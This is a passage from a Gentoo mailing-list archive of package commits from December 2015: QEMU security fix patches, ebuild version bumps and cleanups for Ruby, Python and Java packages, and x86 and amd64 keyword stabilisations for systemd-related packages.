+  #12 0x764c9a8a in g_main_context_dispatch (context=0x5641c400) 
at gmain.c:3122
+
+(without this patch, this can be reproduced with the ivshmem qtest)
+
+Implement an empty mmio write to avoid the crash.
+
+Signed-off-by: Marc-André Lureau 
+Reviewed-by: Paolo Bonzini 
+---
+ hw/pci/msix.c | 6 ++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/hw/pci/msix.c b/hw/pci/msix.c
+index 2fdada4..64c93d8 100644
+--- a/hw/pci/msix.c
 b/hw/pci/msix.c
+@@ -200,8 +200,14 @@ static uint64_t msix_pba_mmio_read(void *opaque, hwaddr 
addr,
+ return pci_get_long(dev->msix_pba + addr);
+ }
+ 
++static void msix_pba_mmio_write(void *opaque, hwaddr addr,
++uint64_t val, unsigned size)
++{
++}
++
+ static const MemoryRegionOps msix_pba_mmio_ops = {
+ .read = msix_pba_mmio_read,
++.write = msix_pba_mmio_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+ .min_access_size = 4,
+-- 
+2.6.2
+

diff --git a/app-emulation/qemu/files/qemu-2.4.1-CVE-2015-8504.patch 
b/app-emulation/qemu/files/qemu-2.4.1-CVE-2015-8504.patch
new file mode 100644
index 000..7b0102a
--- /dev/null
+++ b/app-emulation/qemu/files/qemu-2.4.1-CVE-2015-8504.patch
@@ -0,0 +1,46 @@
+https://bugs.gentoo.org/567828
+
+From 4c65fed8bdf96780735dbdb92a8bd0d6b6526cc3 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit 
+Date: Thu, 3 Dec 2015 18:54:17 +0530
+Subject: [PATCH] ui: vnc: avoid floating point exception
+
+While sending 'SetPixelFormat' messages to a VNC server,
+the client could set the 'red-max', 'green-max' and 'blue-max'
+values to be zero. This leads to a floating point exception in
+write_png_palette while 

[gentoo-commits] repo/gentoo:master commit in: dev-ruby/gettext_i18n_rails/

2015-12-14 Thread Hans de Graaff
commit: 706af73590f41cfb39cdd9a0d7024b12f954f62c
Author: Hans de Graaff  gentoo  org>
AuthorDate: Tue Dec 15 06:24:01 2015 +
Commit: Hans de Graaff  gentoo  org>
CommitDate: Tue Dec 15 06:24:01 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=706af735

dev-ruby/gettext_i18n_rails: add 1.3.2

Package-Manager: portage-2.2.24

 dev-ruby/gettext_i18n_rails/Manifest   |  1 +
 .../gettext_i18n_rails-1.3.2.ebuild| 37 ++
 2 files changed, 38 insertions(+)

diff --git a/dev-ruby/gettext_i18n_rails/Manifest 
b/dev-ruby/gettext_i18n_rails/Manifest
index 8732e21..145ea75 100644
--- a/dev-ruby/gettext_i18n_rails/Manifest
+++ b/dev-ruby/gettext_i18n_rails/Manifest
@@ -1,2 +1,3 @@
 DIST gettext_i18n_rails-1.3.0.tar.gz 20218 SHA256 
b52a90e45d6bcdfac828cebbf52892ccadb320d148bb14a8267f8545b4347877 SHA512 
90136a441aad8c5b26fe39454b675b444ff5cdfa87c4d6ec1738583ea5b6db793b1d05db94e9084905249a75f19239acf5812e6e8350d3ee2537aed76387c2d2
 WHIRLPOOL 
b8503ad978faeeaff0a966be62392bbc0ef4361f28575e50afb799431fb311368b656a4c702749d4dd12f2e342f4c79abe5fe1cd56f64aa41441c073e53449e6
 DIST gettext_i18n_rails-1.3.1.tar.gz 20261 SHA256 
d50193878e7b8eee61ba48fe33c10f7eed28afdcb7e500dd135743cbc9ffd72f SHA512 
761c941aa4d4a746067b84c703b7ca661af3229a2886113a0c5beb1872efd5e74dae7bcf0c6bb476078e636835d19a66e93c8c9c7850024c4ca025e153f1b708
 WHIRLPOOL 
0b865211641224a5dfc6e76e88297fc2cc8576789a099ca65bc3deefb95318313ec8bae24070fde65c0cd219402cc928265b7ef626435836d3fa8e908ad4ece4
+DIST gettext_i18n_rails-1.3.2.tar.gz 20260 SHA256 
7c11f3a1d6d9ae394fd77070013a4fa19330bf4b203a7972d651d2ca2b9056de SHA512 
04412b5e6b7389b3882d33385fbec22de7c61cd93e4cc7bc09c2bb4afb5d61d08e4c513e17aac18cf250f8efe12c6362633f9722f0e335bb9913484ce7abca15
 WHIRLPOOL 
c96c23242a5ffc03d7e929bf1e05d12a41a8f01957efaebfbad122df842e212b2f6f306125b2047a2366328181fe40959c9fabf3b672bfc8074f8b9f1d6fb785

diff --git a/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.3.2.ebuild 
b/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.3.2.ebuild
new file mode 100644
index 000..459fe13
--- /dev/null
+++ b/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.3.2.ebuild
@@ -0,0 +1,37 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+USE_RUBY="ruby20 ruby21"
+
+RUBY_FAKEGEM_TASK_DOC=""
+RUBY_FAKEGEM_EXTRADOC="Readme.md"
+
+RUBY_FAKEGEM_RECIPE_TEST="rspec3"
+
+inherit ruby-fakegem
+
+DESCRIPTION="FastGettext / Rails integration"
+HOMEPAGE="https://github.com/grosser/gettext_i18n_rails;
+SRC_URI="https://github.com/grosser/${PN}/archive/v${PV}.tar.gz -> ${P}.tar.gz"
+
+LICENSE="public-domain"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE=""
+
+ruby_add_bdepend "test? ( dev-ruby/rails:4.0 dev-ruby/activerecord:4.0[sqlite] 
dev-ruby/temple )"
+ruby_add_rdepend ">=dev-ruby/fast_gettext-0.9.0"
+
+all_ruby_prepare() {
+   rm Gemfile Gemfile.lock || die
+
+   # Remove specs for slim and hamlet, template engines we don't package.
+   rm spec/gettext_i18n_rails/slim_parser_spec.rb 
spec/gettext_i18n_rails/haml_parser_spec.rb || die
+
+   # Test against Rails 4.0 (newer versions don't work and we don't use
+   # appraisals for now).
+   sed -e '1igem "rails", "~>4.2.0"' -i spec/spec_helper.rb || die
+}



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/gettext_i18n_rails/

2015-12-14 Thread Hans de Graaff
commit: 9efdad56f98e3bb4ab0b1b4715c23ccd4595bbdf
Author: Hans de Graaff  gentoo  org>
AuthorDate: Tue Dec 15 06:22:13 2015 +
Commit: Hans de Graaff  gentoo  org>
CommitDate: Tue Dec 15 06:22:13 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=9efdad56

dev-ruby/gettext_i18n_rails: cleanup

Package-Manager: portage-2.2.24

 dev-ruby/gettext_i18n_rails/Manifest   |  2 --
 .../gettext_i18n_rails-1.2.2.ebuild| 37 --
 .../gettext_i18n_rails-1.2.3.ebuild| 37 --
 3 files changed, 76 deletions(-)

diff --git a/dev-ruby/gettext_i18n_rails/Manifest 
b/dev-ruby/gettext_i18n_rails/Manifest
index 29f1195..8732e21 100644
--- a/dev-ruby/gettext_i18n_rails/Manifest
+++ b/dev-ruby/gettext_i18n_rails/Manifest
@@ -1,4 +1,2 @@
-DIST gettext_i18n_rails-1.2.2.tar.gz 20254 SHA256 
4bdaff360864211ee8739155f881cbe505d36ae8ec0d592c8180779f6f84a35e SHA512 
c2a02a2aaa118581e81b3ff375ebfb8b4e58fc2313e8d7f321d881370b546d906eec51f848d27f2996ca16938bc7580ed6c27d780d1531a251578ce9260bcb40
 WHIRLPOOL 
c674993506104a8475b7a2be422f11558aa001f362cdc7786fc27cf3b44368ce5855a0ecdc555e28345ad81cd14c70d785c5952cd8bbf6506a0720534c658d38
-DIST gettext_i18n_rails-1.2.3.tar.gz 20252 SHA256 
48af9946c8165ece5c1c94c01045596e25f00bc679e3eb835e45992663444fd7 SHA512 
b28bea0100ca5dd307ead1b77f4e71b491eb12899d772394c6e3ea73150ef4277c7305de0dfd2429ccc635af462f0b0f4f42280cdb666ebc7cee2cf9a43a04a2
 WHIRLPOOL 
f54222b9940b58e16a2e1e27eb36d044ae42fe4b9ed1e06edeb57f5ea1e1ebc727de1cd564cd3679f0851b47fc5ebe93d3913a2ef90de8ebd56917a08ba19913
 DIST gettext_i18n_rails-1.3.0.tar.gz 20218 SHA256 
b52a90e45d6bcdfac828cebbf52892ccadb320d148bb14a8267f8545b4347877 SHA512 
90136a441aad8c5b26fe39454b675b444ff5cdfa87c4d6ec1738583ea5b6db793b1d05db94e9084905249a75f19239acf5812e6e8350d3ee2537aed76387c2d2
 WHIRLPOOL 
b8503ad978faeeaff0a966be62392bbc0ef4361f28575e50afb799431fb311368b656a4c702749d4dd12f2e342f4c79abe5fe1cd56f64aa41441c073e53449e6
 DIST gettext_i18n_rails-1.3.1.tar.gz 20261 SHA256 
d50193878e7b8eee61ba48fe33c10f7eed28afdcb7e500dd135743cbc9ffd72f SHA512 
761c941aa4d4a746067b84c703b7ca661af3229a2886113a0c5beb1872efd5e74dae7bcf0c6bb476078e636835d19a66e93c8c9c7850024c4ca025e153f1b708
 WHIRLPOOL 
0b865211641224a5dfc6e76e88297fc2cc8576789a099ca65bc3deefb95318313ec8bae24070fde65c0cd219402cc928265b7ef626435836d3fa8e908ad4ece4

diff --git a/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.2.2.ebuild 
b/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.2.2.ebuild
deleted file mode 100644
index 03ffeec..000
--- a/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.2.2.ebuild
+++ /dev/null
@@ -1,37 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-USE_RUBY="ruby19 ruby20 ruby21"
-
-RUBY_FAKEGEM_TASK_DOC=""
-RUBY_FAKEGEM_EXTRADOC="Readme.md"
-
-RUBY_FAKEGEM_RECIPE_TEST="rspec3"
-
-inherit ruby-fakegem
-
-DESCRIPTION="FastGettext / Rails integration"
-HOMEPAGE="https://github.com/grosser/gettext_i18n_rails;
-SRC_URI="https://github.com/grosser/${PN}/archive/v${PV}.tar.gz -> ${P}.tar.gz"
-
-LICENSE="public-domain"
-SLOT="0"
-KEYWORDS="~amd64 ~x86"
-IUSE=""
-
-ruby_add_bdepend "test? ( dev-ruby/activerecord:4.0[sqlite] dev-ruby/temple )"
-ruby_add_rdepend ">=dev-ruby/fast_gettext-0.9.0"
-
-all_ruby_prepare() {
-   rm Gemfile Gemfile.lock || die
-
-   # Remove specs for slim and hamlet, template engines we don't package.
-   rm spec/gettext_i18n_rails/slim_parser_spec.rb 
spec/gettext_i18n_rails/haml_parser_spec.rb || die
-
-   # Test against Rails 4.0 (newer versions don't work and we don't use
-   # appraisals for now).
-   sed -e '1igem "rails", "~>4.0.0"' -i spec/spec_helper.rb || die
-}

diff --git a/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.2.3.ebuild 
b/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.2.3.ebuild
deleted file mode 100644
index 4a15b6b..000
--- a/dev-ruby/gettext_i18n_rails/gettext_i18n_rails-1.2.3.ebuild
+++ /dev/null
@@ -1,37 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-USE_RUBY="ruby19 ruby20 ruby21"
-
-RUBY_FAKEGEM_TASK_DOC=""
-RUBY_FAKEGEM_EXTRADOC="Readme.md"
-
-RUBY_FAKEGEM_RECIPE_TEST="rspec3"
-
-inherit ruby-fakegem
-
-DESCRIPTION="FastGettext / Rails integration"
-HOMEPAGE="https://github.com/grosser/gettext_i18n_rails;
-SRC_URI="https://github.com/grosser/${PN}/archive/v${PV}.tar.gz -> ${P}.tar.gz"
-
-LICENSE="public-domain"
-SLOT="0"
-KEYWORDS="~amd64 ~x86"
-IUSE=""
-
-ruby_add_bdepend "test? ( dev-ruby/rails:4.0 dev-ruby/activerecord:4.0[sqlite] 
dev-ruby/temple )"
-ruby_add_rdepend ">=dev-ruby/fast_gettext-0.9.0"
-
-all_ruby_prepare() {
-   rm Gemfile Gemfile.lock || die
-
-   # Remove specs for slim and hamlet, template engines we don't package.
-   rm spec/gettext_i18n_rails/slim_parser_spec.rb 

[gentoo-commits] repo/gentoo:master commit in: sys-apps/systemd/

2015-12-14 Thread Agostino Sarubbo
commit: a0ad3cf1d48f908f7b79d37aaaba8fda85ab0db7
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:13:47 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:13:47 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=a0ad3cf1

sys-apps/systemd: x86 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 sys-apps/systemd/systemd-226-r2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sys-apps/systemd/systemd-226-r2.ebuild 
b/sys-apps/systemd/systemd-226-r2.ebuild
index 0854f1d..b384d5d 100644
--- a/sys-apps/systemd/systemd-226-r2.ebuild
+++ b/sys-apps/systemd/systemd-226-r2.ebuild
@@ -9,7 +9,7 @@ if [[ ${PV} ==  ]]; then
inherit git-r3
 else
SRC_URI="https://github.com/systemd/systemd/archive/v${PV}.tar.gz -> 
${P}.tar.gz"
-   KEYWORDS="~alpha amd64 ~arm ~ia64 ~ppc ~ppc64 ~sparc ~x86"
+   KEYWORDS="~alpha amd64 ~arm ~ia64 ~ppc ~ppc64 ~sparc x86"
 fi
 
 inherit autotools bash-completion-r1 linux-info multilib \



[gentoo-commits] repo/gentoo:master commit in: dev-libs/libgudev/

2015-12-14 Thread Agostino Sarubbo
commit: e6d5ab1590526d356e6527f26645c5270b961c71
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:13:27 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:13:27 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=e6d5ab15

dev-libs/libgudev: x86 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-libs/libgudev/libgudev-230.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-libs/libgudev/libgudev-230.ebuild 
b/dev-libs/libgudev/libgudev-230.ebuild
index 91b049a..d4b2add 100644
--- a/dev-libs/libgudev/libgudev-230.ebuild
+++ b/dev-libs/libgudev/libgudev-230.ebuild
@@ -11,7 +11,7 @@ HOMEPAGE="https://wiki.gnome.org/Projects/libgudev;
 
 LICENSE="LGPL-2.1"
 SLOT="0/0"
-KEYWORDS="~alpha amd64 ~arm ~hppa ~ia64 ~mips ~ppc ~ppc64 ~sparc ~x86"
+KEYWORDS="~alpha amd64 ~arm ~hppa ~ia64 ~mips ~ppc ~ppc64 ~sparc x86"
 IUSE="introspection static-libs"
 
 DEPEND=">=dev-libs/glib-2.22.0:2=[static-libs?]



[gentoo-commits] repo/gentoo:master commit in: dev-python/cvxopt/files/, dev-python/cvxopt/

2015-12-14 Thread Justin Lecher
commit: 10671eba99fe5fac143fcd8f452a1eb731be54f7
Author: Justin Lecher  gentoo  org>
AuthorDate: Mon Dec 14 09:11:32 2015 +
Commit: Justin Lecher  gentoo  org>
CommitDate: Mon Dec 14 09:11:37 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=10671eba

dev-python/cvxopt: Version Bump

Gentoo-Bug: https://bugs.gentoo.org/show_bug.cgi?id=521210

Package-Manager: portage-2.2.26
Signed-off-by: Justin Lecher  gentoo.org>

 dev-python/cvxopt/Manifest   |   1 +
 dev-python/cvxopt/cvxopt-1.1.8.ebuild| 107 ++
 dev-python/cvxopt/files/cvxopt-1.1.8-setup.patch | 136 +++
 3 files changed, 244 insertions(+)

diff --git a/dev-python/cvxopt/Manifest b/dev-python/cvxopt/Manifest
index 4f7f06c..b57d8cf 100644
--- a/dev-python/cvxopt/Manifest
+++ b/dev-python/cvxopt/Manifest
@@ -1 +1,2 @@
 DIST cvxopt-1.1.6.tar.gz 3352996 SHA256 
7b4ccf3ed896dde6624623431c0b1f5e32d874384329ed716f51babcbf416227 SHA512 
b9f5fd7870412423b60068d205efb99d3630012509cb659fb67a10d6175906768846d7c906cf2fcac4be29afd558619b71e2dca730041329195a2365dd1d722c
 WHIRLPOOL 
d43cf090ee0396a77851fb71e6e34c980152bccdd5fdb3ecc53d0a464a505ac87a1e7198d313ec669443970bcf8a2d616f03c2f861b7df2f620bd583a97ea140
+DIST cvxopt-1.1.8.tar.gz 5354013 SHA256 
c96f8d01ae31a5bdec36a65b0587f50cfbf8139335adb70442350a8042da2025 SHA512 
fdf047f203275e687c51b88575639ab0383207f8748969939ecf2939f9a2acc9f5d0e97c68377466fce81eb979b5eb058834f75134cc56df5dbb01805cb98c93
 WHIRLPOOL 
65c8a246e03a7136c2bce3c7ef831f9f82c4cc84b7a1e5db6a2643127ea9164c35782fb1013c0eaf7ac190d036887a131c705fa56b78bda179792eca9d016d8b

diff --git a/dev-python/cvxopt/cvxopt-1.1.8.ebuild 
b/dev-python/cvxopt/cvxopt-1.1.8.ebuild
new file mode 100644
index 000..9861448
--- /dev/null
+++ b/dev-python/cvxopt/cvxopt-1.1.8.ebuild
@@ -0,0 +1,107 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+PYTHON_COMPAT=( python2_7 python3_{3,4,5} )
+
+inherit distutils-r1 eutils toolchain-funcs
+
+DESCRIPTION="Python package for convex optimization"
+HOMEPAGE="http://cvxopt.org/;
+SRC_URI="https://github.com/${PN}/${PN}/archive/${PV}.tar.gz -> ${P}.tar.gz"
+
+LICENSE="GPL-3"
+SLOT="0"
+KEYWORDS="~amd64 ~x86 ~amd64-linux ~x86-linux"
+IUSE="doc +dsdp examples fftw +glpk gsl"
+
+RDEPEND="
+   virtual/blas
+   virtual/cblas
+   virtual/lapack
+   sci-libs/amd:0=
+   sci-libs/cholmod:0=
+   sci-libs/colamd:0=
+   sci-libs/suitesparseconfig:0=
+   sci-libs/umfpack:0=
+   dsdp? ( sci-libs/dsdp:0= )
+   fftw? ( sci-libs/fftw:3.0= )
+   glpk? ( sci-mathematics/glpk:0= )
+   gsl? ( sci-libs/gsl:0= )"
+DEPEND="${RDEPEND}
+   virtual/pkgconfig
+   doc? ( dev-python/sphinx )"
+
+python_prepare_all(){
+   epatch "${FILESDIR}"/${P}-setup.patch
+
+   has_version ">=sci-mathematics/glpk-4.49" && \
+   epatch "${FILESDIR}"/${PN}-1.1.6-glpk449.patch
+
+   rm -r src/C/SuiteSparse*/ || die
+
+   pkg_lib() {
+   local pkg=$(echo $1 | tr '[:lower:]' '[:upper:]')
+   local libs="$($(tc-getPKG_CONFIG) --libs-only-l $1 | \
+   sed -e 's:[ ]-l*\(pthread\|m\)\([ ]\|$\)::g' -e 's:[ 
]*$::' | \
+   tr ' ' '\n' | sort -u | sed -e "s:^-l\(.*\):'\1':g" | \
+   tr '\n' ',' | sed -e 's:,$::')"
+   local libdir="$($(tc-getPKG_CONFIG) --libs-only-L $1 | \
+   sed -e 's:[ ]*$::' | \
+   tr ' ' '\n' | sort -u | sed -e "s:^-L\(.*\):'\1':g" | \
+   tr '\n' ',' | sed -e 's:,$::')"
+   local incdir="$($(tc-getPKG_CONFIG) --cflags-only-I $1 | \
+   sed -e 's:[ ]*$::' | \
+   tr ' ' '\n' | sort -u | sed -e "s:^-L\(.*\):'\1':g" | \
+   tr '\n' ',' | sed -e 's:,$::')"
+   sed -i \
+   -e "/${pkg}_LIB[ ]*=/s:\(.*[ ]*=[ 
]*\[\).*${1}.*:\1${libs}\]:" \
+   -e "s:\(${pkg}_INC_DIR[ ]*=\).*$:\1 ${incdir}:" \
+   -e "s:\[ BLAS_LIB_DIR \]:\[ ${libdir} \]:g" \
+   setup.py || die
+   }
+
+   use_cvx() {
+   local flag=$1
+   if use ${flag} ; then
+   # Switch to ^^ when we switch to EAPI=6.
+   #local uflag=${flag^^}
+   local uflag=$(tr '[:lower:]' '[:upper:]' <<<"${flag}")
+   sed -i \
+   -e "s/\(BUILD_${uflag} =\) 0/\1 1/" \
+   setup.py || die
+   fi
+   }
+
+   pkg_lib blas
+   pkg_lib lapack
+
+   use_cvx gsl
+   use_cvx fftw
+   use_cvx glpk
+   use_cvx dsdp
+
+   sed \
+   -e '/SUITESPARSE_EXT_LIB/s:0:1:g' \
+   -i setup.py || die
+
+   

[gentoo-commits] repo/gentoo:master commit in: dev-java/rngom/

2015-12-14 Thread Patrice Clement
commit: 9b2f4c676dc7cabac7863f9e1192f595e5296746
Author: Patrice Clement  gentoo  org>
AuthorDate: Mon Dec 14 09:29:34 2015 +
Commit: Patrice Clement  gentoo  org>
CommitDate: Mon Dec 14 09:43:23 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=9b2f4c67

dev-java/rngom: Version bump.

Package-Manager: portage-2.2.20.1
Signed-off-by: Patrice Clement  gentoo.org>

 dev-java/rngom/Manifest  |  1 +
 dev-java/rngom/rngom-20100718.ebuild | 49 
 2 files changed, 50 insertions(+)

diff --git a/dev-java/rngom/Manifest b/dev-java/rngom/Manifest
index 0581488..5fe4b46 100644
--- a/dev-java/rngom/Manifest
+++ b/dev-java/rngom/Manifest
@@ -1 +1,2 @@
 DIST rngom-20051226.zip 1370492 SHA256 
aafaeb2e7e1a712affcd89605a1df99c1deb77eb2424291b47556a597225542e SHA512 
487fa97db3ac5d3ab2c9c64b8b406de789393dbe06e38d2b180ab4deb59813b2aeaa46b1ad7d5b55e67dd0558be98d300d7d91e66c922206b35822fdf931d0ef
 WHIRLPOOL 
254d7fd0feba46b4fbf230fd9dd1cbfe6536f6cc06c403fa2b1092fe50464146125cab3a2e5bb6e006f4c3878d3cef4b624ba44ffb1c00b601e20e2474d6041e
+DIST rngom-20100718.jar 196334 SHA256 
e0744ec61d2a8ede4004e520f54747f828d812c2907c1b2dc0eb4f93070f3dc9 SHA512 
af634a3b30b726c9567bb2108dc9c041a60e2de4b395bf1efcca43060d22927896d10bf69b852a3e70b331659803f4dba074392f4be7de6cbdbc210ce90e25cb
 WHIRLPOOL 
18a80fbe4d0f0d16c4bfaf12b6c5e228ffdad0848968a682b00ba956a2ae37e7fb03dae2ad17dae34e92564f667097ade26756f55757cf82ad1a78cf0ab62fa7

diff --git a/dev-java/rngom/rngom-20100718.ebuild 
b/dev-java/rngom/rngom-20100718.ebuild
new file mode 100644
index 000..e9848c6
--- /dev/null
+++ b/dev-java/rngom/rngom-20100718.ebuild
@@ -0,0 +1,49 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+JAVA_PKG_IUSE="doc source"
+
+inherit java-pkg-2 java-pkg-simple
+
+DESCRIPTION="RNGOM is an open-source Java library for parsing RELAX NG 
grammars"
+HOMEPAGE="https://rngom.dev.java.net/;
+SRC_URI="https://repo1.maven.org/maven2/org/kohsuke/${PN}/${PN}/${PV}/${P}-sources.jar
 -> ${P}.jar"
+
+LICENSE="BSD"
+SLOT="0"
+KEYWORDS="~amd64 ~ppc ~ppc64 ~x86"
+IUSE=""
+
+CDEPEND="
+   dev-java/xsdlib:0
+   dev-java/relaxng-datatype:0"
+
+RDEPEND="
+   ${CDEPEND}
+   >=virtual/jre-1.6"
+
+DEPEND="
+   ${CDEPEND}
+   app-arch/unzip
+   >=virtual/jdk-1.6"
+
+JAVA_GENTOO_CLASSPATH="
+   xsdlib
+   relaxng-datatype
+"
+
+JAVA_RM_FILES=(
+   Token.java
+   TokenMgrError.java
+   ParseException.java
+   UCode_UCodeESC_CharStream.java
+   org/kohsuke/rngom/parse/compact/CompactSyntax.java
+   org/kohsuke/rngom/parse/compact/EOFException.java
+   org/kohsuke/rngom/parse/compact/JavaCharStream.java
+   org/kohsuke/rngom/parse/compact/CompactParseable.java
+   org/kohsuke/rngom/parse/compact/EscapeSyntaxException.java
+   org/kohsuke/rngom/parse/compact/CompactSyntaxConstants.java
+   org/kohsuke/rngom/parse/compact/CompactSyntaxTokenManager.java
+)



[gentoo-commits] repo/gentoo:master commit in: media-gfx/pinta/

2015-12-14 Thread Ian Delaney
commit: 7eded6b17b4739237239f44da05d7fd0b6b24c78
Author: Alessandro Calorì  gmail  com>
AuthorDate: Mon Dec 14 15:14:28 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Mon Dec 14 15:28:06 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7eded6b1

media-gfx/pinta: revbump to 1.6-r2, removed redundant dependencies

mono-addins with "gtk" USE flag is enough to pull in every Mono
library needed by Pinta

Package-Manager: portage-2.2.24

 media-gfx/pinta/pinta-1.6-r2.ebuild | 47 +
 1 file changed, 47 insertions(+)

diff --git a/media-gfx/pinta/pinta-1.6-r2.ebuild 
b/media-gfx/pinta/pinta-1.6-r2.ebuild
new file mode 100644
index 000..12e6deb
--- /dev/null
+++ b/media-gfx/pinta/pinta-1.6-r2.ebuild
@@ -0,0 +1,47 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+inherit fdo-mime mono-env gnome2-utils
+
+DESCRIPTION="Simple Painting for Gtk"
+HOMEPAGE="http://pinta-project.com;
+SRC_URI="https://github.com/PintaProject/Pinta/releases/download/${PV}/${P}.tar.gz;
+
+LICENSE="MIT CC-BY-3.0"
+SLOT="0"
+KEYWORDS="~amd64 ~x86"
+IUSE=""
+
+COMMON_DEPEND="dev-lang/mono
+   dev-dotnet/mono-addins[gtk]"
+RDEPEND="${COMMON_DEPEND}
+   x11-libs/cairo[X]
+   x11-libs/gdk-pixbuf[X,jpeg,tiff]
+   x11-themes/gnome-icon-theme"
+DEPEND="${COMMON_DEPEND}
+   dev-util/intltool
+   virtual/pkgconfig
+   sys-devel/gettext"
+
+src_prepare() {
+   epatch "${FILESDIR}/${P}-mono-4.patch"
+}
+
+pkg_preinst() {
+   gnome2_icon_savelist
+}
+
+pkg_postinst() {
+   fdo-mime_desktop_database_update
+   fdo-mime_mime_database_update
+   gnome2_icon_cache_update
+}
+
+pkg_postrm() {
+   fdo-mime_desktop_database_update
+   fdo-mime_mime_database_update
+   gnome2_icon_cache_update
+}



[gentoo-commits] repo/gentoo:master commit in: /

2015-12-14 Thread Ian Delaney
commit: 8cd4265ade754673d1211f7099a7c4c706e80098
Author: Ian Delaney  gentoo  org>
AuthorDate: Mon Dec 14 15:31:51 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Mon Dec 14 15:33:29 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=8cd4265a

Merge branch 'pull-469'

Pull request: https://github.com/gentoo/gentoo/pull/469

 media-gfx/pinta/{pinta-1.6-r1.ebuild => pinta-1.6-r2.ebuild} | 7 +--
 1 file changed, 1 insertion(+), 6 deletions(-)



[gentoo-commits] repo/gentoo:master commit in: sys-apps/hwids/

2015-12-14 Thread Agostino Sarubbo
commit: 93ffedc21a254938211e7fd0710938254159bf06
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:13:22 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:13:22 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=93ffedc2

sys-apps/hwids: x86 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 sys-apps/hwids/hwids-20150717-r1.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sys-apps/hwids/hwids-20150717-r1.ebuild 
b/sys-apps/hwids/hwids-20150717-r1.ebuild
index bd2de21..bc08ac2 100644
--- a/sys-apps/hwids/hwids-20150717-r1.ebuild
+++ b/sys-apps/hwids/hwids-20150717-r1.ebuild
@@ -12,7 +12,7 @@ if [[ ${PV} == "" ]]; then
inherit git-2
 else
SRC_URI="${HOMEPAGE}/archive/${P}.tar.gz"
-   KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 
~s390 ~sh ~sparc ~x86 ~amd64-fbsd ~x86-fbsd ~x64-freebsd ~amd64-linux 
~arm-linux ~x86-linux"
+   KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 
~s390 ~sh ~sparc x86 ~amd64-fbsd ~x86-fbsd ~x64-freebsd ~amd64-linux ~arm-linux 
~x86-linux"
 fi
 
 LICENSE="|| ( GPL-2 BSD ) public-domain"



[gentoo-commits] repo/gentoo:master commit in: sys-apps/systemd/

2015-12-14 Thread Agostino Sarubbo
commit: 6b90fdc1a26f3ad6bad0c0756d97a09f5224b01e
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 16:09:50 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 16:09:50 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=6b90fdc1

sys-apps/systemd: amd64 stable wrt bug #568082

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 sys-apps/systemd/systemd-226-r2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sys-apps/systemd/systemd-226-r2.ebuild 
b/sys-apps/systemd/systemd-226-r2.ebuild
index 44742e8..0854f1d 100644
